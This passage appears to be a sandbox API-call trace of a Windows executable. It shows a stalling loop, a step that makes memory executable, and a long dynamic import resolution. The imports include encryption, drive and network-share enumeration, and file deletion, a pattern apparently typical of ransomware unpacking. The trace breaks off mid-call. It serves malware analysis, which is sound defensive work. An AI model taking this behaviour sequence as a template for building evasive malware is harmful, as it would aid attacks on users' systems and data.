1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.899] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.899] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0048.900] GetCaretPos (in: lpPoint=0x18eb78 | out: lpPoint=0x18eb78) returned 1 [0048.900] GetAtomNameA (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0051.192] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0051.217] VirtualProtect (in: lpAddress=0x270020, dwSize=0x90c00, flNewProtect=0x40, lpflOldProtect=0x18e670 | out: lpflOldProtect=0x18e670*=0x4) returned 1 [0051.275] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0051.275] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0051.276] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0051.276] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0051.276] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0051.276] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0051.276] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0051.276] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0051.276] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0051.279] Module32First (hSnapshot=0x58, lpme=0x18e804) returned 1 [0051.281] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x1de0000 [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0051.323] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0051.323] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0051.323] SetErrorMode (uMode=0x400) returned 0x0 [0051.323] SetErrorMode (uMode=0x0) returned 0x400 [0051.323] GetVersionExA (in: lpVersionInformation=0x18d734*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18d734*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0051.323] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fc0000 [0051.342] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18e7bc | out: lpflOldProtect=0x18e7bc*=0x2) returned 1 [0051.637] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0051.642] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0051.642] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0051.642] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0051.642] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0051.642] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0051.642] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0051.642] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0053.570] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0053.570] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0053.570] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0053.570] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0063.122] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0063.122] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0063.122] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0063.122] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0063.123] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0063.123] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0063.123] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0063.123] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0063.596] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0063.596] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0063.597] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0063.597] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0063.597] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0063.597] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0063.597] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0063.598] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0063.598] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0063.598] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0063.598] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0063.599] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0063.600] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0063.601] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0063.602] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0063.603] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0063.604] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0063.605] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0063.606] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0063.607] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0063.608] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0063.608] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0063.608] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0063.608] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0063.608] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0063.609] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0063.610] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0063.611] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0063.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0063.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0063.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0063.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0063.611] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0063.611] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0063.611] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0063.611] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0063.612] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0063.613] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0063.613] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0063.614] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0063.615] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0063.616] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0063.616] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0063.616] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0063.616] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0063.616] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0068.593] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0068.594] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0068.594] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0068.594] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0068.594] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0068.594] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0068.594] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0068.595] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0068.595] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0068.595] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0068.595] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0068.595] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0068.595] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0068.596] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0068.596] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75600000 [0069.384] GetProcAddress (hModule=0x75600000, lpProcName="GetAdaptersInfo") returned 0x75609263 [0069.384] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0070.289] GetProcAddress (hModule=0x77230000, 